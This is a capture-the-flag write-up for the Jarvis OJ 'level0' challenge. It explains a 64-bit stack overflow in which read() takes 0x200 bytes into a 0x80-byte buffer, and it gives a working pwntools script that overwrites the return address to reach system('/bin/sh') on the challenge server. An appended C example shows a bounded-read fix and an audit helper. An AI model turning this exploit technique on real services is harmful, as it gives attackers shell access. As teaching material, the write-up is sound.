Check the protections and the target platform:

liu@liu-F117-F:~/桌面/oj/level0$ checksec level0
[*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

NX is enabled and the binary is 64-bit; there is no stack canary and no PIE, so addresses in the binary are fixed.
.text:0000000000400596 ; __unwind {
.text:0000000000400596 push rbp
.text:0000000000400597 mov rbp, rsp
.text:000000000040059A mov edi, offset command ; "/bin/sh"
.text:000000000040059F call _system
.text:00000000004005A4 pop rbp
.text:00000000004005A5 retn
.text:00000000004005A5 ; } // starts at 400596
.text:00000000004005A5 callsystem endp
.text:00000000004005A5
The binary contains a callsystem function that calls system("/bin/sh"), at 0x400596.

ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]
  return read(0, &buf, 0x200uLL);
}

Stack overflow: buf sits 0x80 bytes below the saved rbp, but read() accepts up to 0x200 bytes, so input past 0x80 + 8 bytes overwrites the saved return address.
from pwn import *

s_addr = 0x0000000000400596  # address of callsystem, which runs system("/bin/sh")
p = remote("pwn2.jarvisoj.com", 9881)
p.recvline()
# 0x80 bytes fill buf (at rbp-0x80), 8 more overwrite the saved rbp,
# and the next 8 bytes replace the return address with callsystem
p.sendline(b"A" * 0x80 + b"A" * 8 + p64(s_addr))
p.interactive()

Differences from the 32-bit case: the saved rbp is 8 bytes, and the address is packed with p64().
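For the defensive side of this bug, the following is an added example (not code from the challenge binary or the writeup) showing the fix the decompiled vulnerable_function() needs: the read length must be derived from the buffer's size rather than a larger constant. It also includes a small audit helper that, given the frame layout read from the decompilation (buffer at rbp-0x80, x86-64 saved rbp of 8 bytes) and the maximum read length, reports whether an oversized read can reach the saved return address. The pipe-based demo and the canary word after the buffer are constructed so the code runs offline; BUF_SIZE mirrors the 0x80-byte buffer from the page.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>

#define BUF_SIZE 0x80u   /* matches buf at [rbp-80h] in the decompiled function */

/* Audit helper (assumption: x86-64 frame, 8-byte saved rbp directly above the
   buffer). Returns 1 if a read of up to max_read bytes into a buffer that sits
   buf_to_rbp bytes below the saved rbp can overwrite the saved return address. */
int read_can_reach_return_addr(size_t buf_to_rbp, size_t max_read) {
    return max_read > buf_to_rbp + 8;
}

/* Hardened replacement for the read() pattern in vulnerable_function():
   the length passed to read() is bounded by the buffer capacity and the
   result is NUL-terminated. Returns bytes stored, or -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Offline demonstration: push input_len bytes of 'A' through a pipe (constructed
   input, standing in for fd 0) into a BUF_SIZE buffer guarded by a canary word.
   Returns the number of bytes stored if the canary survived, or -1 if the
   read overran the buffer or anything failed. */
ssize_t demo_oversized_input(size_t input_len) {
    struct {
        char buf[BUF_SIZE];
        uint64_t canary;      /* stands in for the saved rbp that follows buf */
    } frame;
    const uint64_t sentinel = 0x4242424242424242ull;
    frame.canary = sentinel;

    int fds[2];
    if (pipe(fds) != 0) return -1;

    char *payload = malloc(input_len);
    if (payload == NULL) { close(fds[0]); close(fds[1]); return -1; }
    memset(payload, 'A', input_len);
    ssize_t written = write(fds[1], payload, input_len);
    close(fds[1]);
    free(payload);
    if (written != (ssize_t)input_len) { close(fds[0]); return -1; }

    ssize_t n = read_bounded(fds[0], frame.buf, sizeof frame.buf);
    close(fds[0]);

    /* A correct bound never touches the word after the buffer. */
    if (frame.canary != sentinel) return -1;
    return n;
}

int main(void) {
    printf("read(0x200) into buf at rbp-0x80 reaches return address: %d\n",
           read_can_reach_return_addr(0x80, 0x200));
    printf("bytes stored from a 0x200-byte input with a bounded read: %zd\n",
           demo_oversized_input(0x200));
    return 0;
}
```

With the original 0x200 bound the helper reports that the return address is reachable; with the read tied to the buffer size, a 0x200-byte input yields at most BUF_SIZE - 1 stored bytes and the word after the buffer is untouched.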